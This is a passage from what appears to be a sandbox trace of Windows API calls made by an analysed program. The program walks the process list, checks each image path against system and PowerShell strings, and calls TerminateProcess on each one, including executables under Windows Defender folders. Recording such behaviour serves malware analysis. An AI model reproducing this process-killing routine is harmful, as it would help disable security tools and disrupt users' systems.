Player\\useful-courts.exe" (normalized: "c:\\program files\\windows media player\\useful-courts.exe")) returned 0x37 [0059.923] StrStrIW (lpFirst="C:\\Program Files\\Windows Media Player\\useful-courts.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.923] StrStrIW (lpFirst="C:\\Program Files\\Windows Media Player\\useful-courts.exe", lpSrch="powershell.exe") returned 0x0 [0059.923] StrStrIW (lpFirst="C:\\Program Files\\Windows Media Player\\useful-courts.exe", lpSrch="powershell.exe") returned 0x0 [0059.923] StrStrIW (lpFirst="C:\\Program Files\\Windows Media Player\\useful-courts.exe", lpSrch="powershell.exe") returned 0x0 [0059.923] StrStrIW (lpFirst="C:\\Program Files\\Windows Media Player\\useful-courts.exe", lpSrch="powershell.exe") returned 0x0 [0059.923] StrStrIW (lpFirst="C:\\Program Files\\Windows Media Player\\useful-courts.exe", lpSrch="powershell.exe") returned 0x0 [0059.923] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.923] GetTickCount () returned 0x115076f [0059.923] GetCurrentProcessId () returned 0xf00 [0059.923] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xce8) returned 0x404 [0059.923] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.923] TerminateProcess (hProcess=0x404, uExitCode=0x115076f) returned 1 [0059.926] CloseHandle (hObject=0x404) returned 1 [0059.926] CloseHandle (hObject=0x3fc) returned 1 [0059.926] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="radios_approx.exe")) returned 1 [0059.926] GetCurrentProcessId () returned 0xf00 [0059.926] GetCurrentProcess () returned 0xffffffff [0059.926] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.927] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x550) returned 0x3fc [0059.927] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Media Player\\radios_approx.exe" (normalized: "c:\\program files (x86)\\windows media player\\radios_approx.exe")) returned 0x3d [0059.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\radios_approx.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\radios_approx.exe", lpSrch="powershell.exe") returned 0x0 [0059.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\radios_approx.exe", lpSrch="powershell.exe") returned 0x0 [0059.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\radios_approx.exe", lpSrch="powershell.exe") returned 0x0 [0059.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\radios_approx.exe", lpSrch="powershell.exe") returned 0x0 [0059.927] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\radios_approx.exe", lpSrch="powershell.exe") returned 0x0 [0059.927] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.927] GetTickCount () returned 0x115076f [0059.927] GetCurrentProcessId () returned 0xf00 [0059.927] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x550) returned 0x404 [0059.927] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.927] TerminateProcess (hProcess=0x404, uExitCode=0x115076f) returned 1 [0059.930] CloseHandle (hObject=0x404) returned 1 [0059.930] CloseHandle (hObject=0x3fc) returned 1 [0059.930] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque.exe")) returned 1 [0059.930] GetCurrentProcessId () returned 0xf00 [0059.931] GetCurrentProcess () returned 0xffffffff [0059.931] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.931] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xa20) returned 0x3fc [0059.931] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Sidebar\\albuquerque.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\albuquerque.exe")) returned 0x36 [0059.931] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\albuquerque.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.931] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\albuquerque.exe", lpSrch="powershell.exe") returned 0x0 [0059.931] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\albuquerque.exe", lpSrch="powershell.exe") returned 0x0 [0059.931] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\albuquerque.exe", lpSrch="powershell.exe") returned 0x0 [0059.931] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\albuquerque.exe", lpSrch="powershell.exe") returned 0x0 [0059.931] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\albuquerque.exe", lpSrch="powershell.exe") returned 0x0 [0059.931] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.931] GetTickCount () returned 0x115076f [0059.931] GetCurrentProcessId () returned 0xf00 [0059.931] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xa20) returned 0x404 [0059.931] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.931] TerminateProcess (hProcess=0x404, uExitCode=0x115076f) returned 1 [0059.934] CloseHandle (hObject=0x404) returned 1 [0059.934] CloseHandle (hObject=0x3fc) returned 1 [0059.934] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0059.934] GetCurrentProcessId () returned 0xf00 [0059.934] GetCurrentProcess () returned 0xffffffff [0059.935] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.935] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xd14) returned 0x3fc [0059.935] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\try.exe" (normalized: "c:\\program files\\windows sidebar\\try.exe")) returned 0x28 [0059.935] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\try.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.935] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\try.exe", lpSrch="powershell.exe") returned 0x0 [0059.935] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\try.exe", lpSrch="powershell.exe") returned 0x0 [0059.935] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\try.exe", lpSrch="powershell.exe") returned 0x0 [0059.935] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\try.exe", lpSrch="powershell.exe") returned 0x0 [0059.935] StrStrIW (lpFirst="C:\\Program Files\\Windows Sidebar\\try.exe", lpSrch="powershell.exe") returned 0x0 [0059.935] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.935] GetTickCount () returned 0x115076f [0059.935] GetCurrentProcessId () returned 0xf00 [0059.935] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xd14) returned 0x404 [0059.935] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.935] TerminateProcess (hProcess=0x404, uExitCode=0x115076f) returned 1 [0059.938] CloseHandle (hObject=0x404) returned 1 [0059.938] CloseHandle (hObject=0x3fc) returned 1 [0059.938] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ide_poly_actually.exe")) returned 1 [0059.939] GetCurrentProcessId () returned 0xf00 [0059.939] GetCurrentProcess () returned 0xffffffff [0059.939] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.939] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xd0c) returned 0x3fc [0059.939] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Photo Viewer\\ide_poly_actually.exe" (normalized: "c:\\program files\\windows photo viewer\\ide_poly_actually.exe")) returned 0x3b [0059.939] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\ide_poly_actually.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.939] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\ide_poly_actually.exe", lpSrch="powershell.exe") returned 0x0 [0059.939] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\ide_poly_actually.exe", lpSrch="powershell.exe") returned 0x0 [0059.939] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\ide_poly_actually.exe", lpSrch="powershell.exe") returned 0x0 [0059.939] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\ide_poly_actually.exe", lpSrch="powershell.exe") returned 0x0 [0059.939] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\ide_poly_actually.exe", lpSrch="powershell.exe") returned 0x0 [0059.939] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.939] GetTickCount () returned 0x115077e [0059.939] GetCurrentProcessId () returned 0xf00 [0059.939] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xd0c) returned 0x404 [0059.939] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.940] TerminateProcess (hProcess=0x404, uExitCode=0x115077e) returned 1 [0059.942] CloseHandle (hObject=0x404) returned 1 [0059.942] CloseHandle (hObject=0x3fc) returned 1 [0059.942] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="inn.exe")) returned 1 [0059.943] GetCurrentProcessId () returned 0xf00 [0059.943] GetCurrentProcess () returned 0xffffffff [0059.943] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.943] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x97c) returned 0x3fc [0059.943] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Adobe\\inn.exe" (normalized: "c:\\program files (x86)\\adobe\\inn.exe")) returned 0x24 [0059.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\inn.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\inn.exe", lpSrch="powershell.exe") returned 0x0 [0059.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\inn.exe", lpSrch="powershell.exe") returned 0x0 [0059.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\inn.exe", lpSrch="powershell.exe") returned 0x0 [0059.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\inn.exe", lpSrch="powershell.exe") returned 0x0 [0059.943] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\inn.exe", lpSrch="powershell.exe") returned 0x0 [0059.943] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.944] GetTickCount () returned 0x115077e [0059.944] GetCurrentProcessId () returned 0xf00 [0059.944] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x97c) returned 0x404 [0059.944] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.944] TerminateProcess (hProcess=0x404, uExitCode=0x115077e) returned 1 [0059.946] CloseHandle (hObject=0x404) returned 1 [0059.946] CloseHandle (hObject=0x3fc) returned 1 [0059.946] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="heating.exe")) returned 1 [0059.947] GetCurrentProcessId () returned 0xf00 [0059.947] GetCurrentProcess () returned 0xffffffff [0059.947] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.947] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x778) returned 0x3fc [0059.947] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\heating.exe" (normalized: "c:\\program files\\reference assemblies\\heating.exe")) returned 0x31 [0059.947] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\heating.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.947] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\heating.exe", lpSrch="powershell.exe") returned 0x0 [0059.947] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\heating.exe", lpSrch="powershell.exe") returned 0x0 [0059.947] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\heating.exe", lpSrch="powershell.exe") returned 0x0 [0059.947] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\heating.exe", lpSrch="powershell.exe") returned 0x0 [0059.947] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\heating.exe", lpSrch="powershell.exe") returned 0x0 [0059.948] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.948] GetTickCount () returned 0x115077e [0059.948] GetCurrentProcessId () returned 0xf00 [0059.948] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x778) returned 0x404 [0059.948] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.948] TerminateProcess (hProcess=0x404, uExitCode=0x115077e) returned 1 [0059.954] CloseHandle (hObject=0x404) returned 1 [0059.954] CloseHandle (hObject=0x3fc) returned 1 [0059.954] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="qualifications-headlines-cope.exe")) returned 1 [0059.954] GetCurrentProcessId () returned 0xf00 [0059.954] GetCurrentProcess () returned 0xffffffff [0059.954] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.954] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xd64) returned 0x3fc [0059.954] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Microsoft.NET\\qualifications-headlines-cope.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\qualifications-headlines-cope.exe")) returned 0x46 [0059.954] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft.NET\\qualifications-headlines-cope.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.956] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft.NET\\qualifications-headlines-cope.exe", lpSrch="powershell.exe") returned 0x0 [0059.956] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft.NET\\qualifications-headlines-cope.exe", lpSrch="powershell.exe") returned 0x0 [0059.956] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft.NET\\qualifications-headlines-cope.exe", lpSrch="powershell.exe") returned 0x0 [0059.956] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft.NET\\qualifications-headlines-cope.exe", lpSrch="powershell.exe") returned 0x0 [0059.956] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft.NET\\qualifications-headlines-cope.exe", lpSrch="powershell.exe") returned 0x0 [0059.956] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.956] GetTickCount () returned 0x115078e [0059.956] GetCurrentProcessId () returned 0xf00 [0059.956] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xd64) returned 0x404 [0059.956] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.956] TerminateProcess (hProcess=0x404, uExitCode=0x115078e) returned 1 [0059.957] CloseHandle (hObject=0x404) returned 1 [0059.957] CloseHandle (hObject=0x3fc) returned 1 [0059.957] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="method-pads.exe")) returned 1 [0059.958] GetCurrentProcessId () returned 0xf00 [0059.958] GetCurrentProcess () returned 0xffffffff [0059.958] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.958] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xcf8) returned 0x3fc [0059.958] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Adobe\\method-pads.exe" (normalized: "c:\\program files (x86)\\adobe\\method-pads.exe")) returned 0x2c [0059.958] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\method-pads.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.958] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\method-pads.exe", lpSrch="powershell.exe") returned 0x0 [0059.958] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\method-pads.exe", lpSrch="powershell.exe") returned 0x0 [0059.958] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\method-pads.exe", lpSrch="powershell.exe") returned 0x0 [0059.958] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\method-pads.exe", lpSrch="powershell.exe") returned 0x0 [0059.958] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\method-pads.exe", lpSrch="powershell.exe") returned 0x0 [0059.958] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.958] GetTickCount () returned 0x115078e [0059.958] GetCurrentProcessId () returned 0xf00 [0059.958] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xcf8) returned 0x404 [0059.958] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.958] TerminateProcess (hProcess=0x404, uExitCode=0x115078e) returned 1 [0059.959] CloseHandle (hObject=0x404) returned 1 [0059.959] CloseHandle (hObject=0x3fc) returned 1 [0059.959] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="information-much.exe")) returned 1 [0059.960] GetCurrentProcessId () returned 0xf00 [0059.960] GetCurrentProcess () returned 0xffffffff [0059.960] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.960] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xd44) returned 0x3fc [0059.960] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Defender\\information-much.exe" (normalized: "c:\\program files (x86)\\windows defender\\information-much.exe")) returned 0x3c [0059.960] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\information-much.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.960] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\information-much.exe", lpSrch="powershell.exe") returned 0x0 [0059.960] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\information-much.exe", lpSrch="powershell.exe") returned 0x0 [0059.960] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\information-much.exe", lpSrch="powershell.exe") returned 0x0 [0059.960] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\information-much.exe", lpSrch="powershell.exe") returned 0x0 [0059.960] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\information-much.exe", lpSrch="powershell.exe") returned 0x0 [0059.960] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.960] GetTickCount () returned 0x115078e [0059.960] GetCurrentProcessId () returned 0xf00 [0059.960] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xd44) returned 0x404 [0059.961] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.961] TerminateProcess (hProcess=0x404, uExitCode=0x115078e) returned 1 [0059.961] CloseHandle (hObject=0x404) returned 1 [0059.961] CloseHandle (hObject=0x3fc) returned 1 [0059.961] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="namespace_bankruptcy.exe")) returned 1 [0059.962] GetCurrentProcessId () returned 0xf00 [0059.962] GetCurrentProcess () returned 0xffffffff [0059.962] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.962] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xd38) returned 0x3fc [0059.962] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Defender Advanced Threat Protection\\namespace_bankruptcy.exe" (normalized: "c:\\program files\\windows defender advanced threat protection\\namespace_bankruptcy.exe")) returned 0x55 [0059.962] StrStrIW (lpFirst="C:\\Program Files\\Windows Defender Advanced Threat Protection\\namespace_bankruptcy.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.962] StrStrIW (lpFirst="C:\\Program Files\\Windows Defender Advanced Threat Protection\\namespace_bankruptcy.exe", lpSrch="powershell.exe") returned 0x0 [0059.962] StrStrIW (lpFirst="C:\\Program Files\\Windows Defender Advanced Threat Protection\\namespace_bankruptcy.exe", lpSrch="powershell.exe") returned 0x0 [0059.962] StrStrIW (lpFirst="C:\\Program Files\\Windows Defender Advanced Threat Protection\\namespace_bankruptcy.exe", lpSrch="powershell.exe") returned 0x0 [0059.962] StrStrIW 